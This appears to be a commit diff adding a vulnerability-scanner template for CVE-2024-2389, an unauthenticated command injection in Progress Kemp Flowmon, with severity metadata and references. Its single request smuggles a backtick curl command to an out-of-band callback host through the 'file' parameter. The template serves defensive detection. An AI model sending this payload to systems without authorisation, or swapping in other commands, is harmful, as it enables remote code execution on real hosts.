Create CVE-2024-2389.yaml
parent
999c7bfb49
commit
da66e196b3
|
@ -0,0 +1,28 @@
|
||||||
|
id: CVE-2024-2389
|
||||||
|
info:
|
||||||
|
name: Progress Kemp Flowmon Command Injection (CVE-2024-2389)
|
||||||
|
author: pdresearch, parthmalhotra
|
||||||
|
severity: critical
|
||||||
|
description: In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.
|
||||||
|
reference:
|
||||||
|
- https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
|
||||||
|
- https://www.flowmon.com
|
||||||
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1777977522140950640
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 10
|
||||||
|
cve-id: CVE-2024-2389
|
||||||
|
cwe-id: CWE-78
|
||||||
|
epss-score: 0.00043
|
||||||
|
epss-percentile: 0.07895
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
Loading…
Reference in New Issue